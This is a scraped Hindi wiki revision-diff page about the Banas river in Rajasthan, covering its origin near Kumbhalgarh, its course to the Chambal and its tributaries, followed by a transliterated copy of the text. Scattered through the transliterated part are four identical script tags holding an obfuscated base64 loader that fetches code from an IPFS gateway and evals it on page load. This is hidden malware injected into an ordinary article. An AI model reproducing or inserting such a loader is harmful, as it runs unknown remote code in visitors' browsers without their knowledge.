Difference between revisions of "बनास नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''बनास नदी''', [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में बहती है। यह नदी [[चम्बल नदी]] की सहायक नदी है।
+
'''बनास नदी''' [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में बहती है। यह नदी [[चम्बल नदी]] की सहायक नदी है। बनास एक मात्र ऐसी नदी है, जो अपना संपूर्ण चक्र राजस्थान में ही पूरा करती है। 'बनास' अर्थात "वन की आशा" के रुप में जानी जाने वाली यह नदी [[उदयपुर ज़िला|उदयपुर ज़िले]] के [[अरावली पर्वतश्रेणी|अरावली पर्वत श्रेणियों]] में [[कुंभलगढ़ उदयपुर|कुंभलगढ़]] के पास खमनौर की पहाड़ियों से निकलती है।
*इसकी घाटी में प्राचीन मानव सभ्यता के अनेक प्रकार के प्रस्तर के उपकरण प्राप्त हुए हैं।
+
{{tocright}}
*इसका उद्गम [[कुंभलगढ़]] के निकट है और यह [[अरावली पर्वतमाला]] को चीरकर अपना रास्ता बनाती है।  
+
==उद्गम तथा प्रवाह क्षेत्र==
*इसके बाद पूर्वोत्तर की ओर बढ़ते हुए यह मैदानों तक पहुँचती है और 500 किमी बहने के बाद शिवपुर के उत्तर में [[चंबल नदी]] से मिलती है।  
+
इस नदी की घाटी में प्राचीन मानव सभ्यता के अनेक प्रकार के प्रस्तर के उपकरण प्राप्त हुए हैं। बनास नदी का उद्गम [[कुंभलगढ़]] के निकट अरावली पर्वत मालाओं में है। यह [[अरावली पर्वतमाला]] को चीरकर अपना रास्ता बनाती है। इसके बाद पूर्वोत्तर की ओर बढ़ते हुए यह मैदानों तक पहुँचती है। नदी [[नाथद्वारा]], कंकरोली, राजसमंद और [[भीलवाड़ा]] ज़िले में बहती हुई टौंक, [[सवाई माधोपुर]] के पश्चात रामेश्वरम के नजदीक [[चंबल नदी]] में गिर जाती है।
*बनास एक मौसमी नदी है, जो गर्मी के समय अक्सर सूखी रहती है, लेकिन इसके बावजूद यह सिचाई का स्रोत है।  
+
====सहायक नदियाँ====
*बरेच और कोटरी इसकी सहायक नदियाँ हैं।
+
बनास को मौसमी नदी के रूप में जाना जाता है। यह गर्मी के समय अक्सर सूखी रहती है, लेकिन इसके बावजूद यह सिचाई का मुख्य स्रोत है। इसकी समूची घाटी में [[मिट्टी]] के बहाव से कई स्थानों में अनुपजाऊ भूमि का निर्माण हो गया। इसकी लंबाई लगभग 480 किलोमीटर है। इसकी सहायक नदियों में बेडच, कोठरी, मांसी, खारी, मुरेल व धुन्ध है।
*समूची घाटी में [[मिट्टी]] के बहाव से कई स्थानों में अनुपजाऊ भूमि का निर्माण हो गया।  
+
#बेडच नदी 190 किलोमीटर लंबी है तथा गोगंडा पहाड़ियों, उदयपुर से निकलती है।
 +
#कोठारी नदी उत्तरी राजसमंद ज़िले की दिवेर पहाड़ियों से निकलती है। यह 145 किलोमीटर लंबी है तथा उदयपुर, भीलवाड़ा में बहती हुई बनास में मिल जाती है।
 +
#खारी नदी 80 किलोमीटर लंबी है तथा राजसमंद के बिजराल की पहाड़ियों से निकलकर देवली (टौंक) के नजदीक बनास में मिल जाती है।
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==बाहरी कड़ियाँ==
 +
*[http://rajgkbook.blogspot.in/p/blog-page_3658.html राजस्थान की नदियाँ]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत की नदियाँ}}
 
{{भारत की नदियाँ}}
[[Category:भूगोल कोश]]
+
[[Category:भूगोल कोश]][[Category:भारत की नदियाँ]][[Category:राजस्थान की नदियाँ]]
[[Category:भारत की नदियाँ]]
 
[[Category:राजस्थान की नदियाँ]]
 
 
__INDEX__
 
__INDEX__

Revision as of 09:31, 29 December 2012

banas nadi rajasthan rajy, pashchimottar bharat mean bahati hai. yah nadi chambal nadi ki sahayak nadi hai. banas ek matr aisi nadi hai, jo apana sanpoorn chakr rajasthan mean hi poora karati hai. 'banas' arthat "van ki asha" ke rup mean jani jane vali yah nadi udayapur zile ke aravali parvat shreniyoan mean kuanbhalagadh ke pas khamanaur ki paha diyoan se nikalati hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

udgam tatha pravah kshetr

is nadi ki ghati mean prachin manav sabhyata ke anek prakar ke prastar ke upakaran prapt hue haian. banas nadi ka udgam kuanbhalagadh ke nikat aravali parvat malaoan mean hai. yah aravali parvatamala ko chirakar apana rasta banati hai. isake bad poorvottar ki or badhate hue yah maidanoan tak pahuanchati hai. nadi nathadvara, kankaroli, rajasamand aur bhilava da zile mean bahati huee tauank, savaee madhopur ke pashchat rameshvaram ke najadik chanbal nadi mean gir jati hai.

sahayak nadiyaan

banas ko mausami nadi ke roop mean jana jata hai. yah garmi ke samay aksar sookhi rahati hai, lekin isake bavajood yah sichaee ka mukhy srot hai. isaki samoochi ghati mean mitti ke bahav se kee sthanoan mean anupajaoo bhoomi ka nirman ho gaya. isaki lanbaee lagabhag 480 kilomitar hai. isaki sahayak nadiyoan mean bedach, kothari, maansi, khari, murel v dhundh hai.

  1. bedach nadi 190 kilomitar lanbi hai tatha goganda paha diyoan, udayapur se nikalati hai.
  2. kothari nadi uttari rajasamand zile ki diver paha diyoan se nikalati hai. yah 145 kilomitar lanbi hai tatha udayapur, bhilava da mean bahati huee banas mean mil jati hai.
  3. khari nadi 80 kilomitar lanbi hai tatha rajasamand ke bijaral ki paha diyoan se nikalakar devali (tauank) ke najadik banas mean mil jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>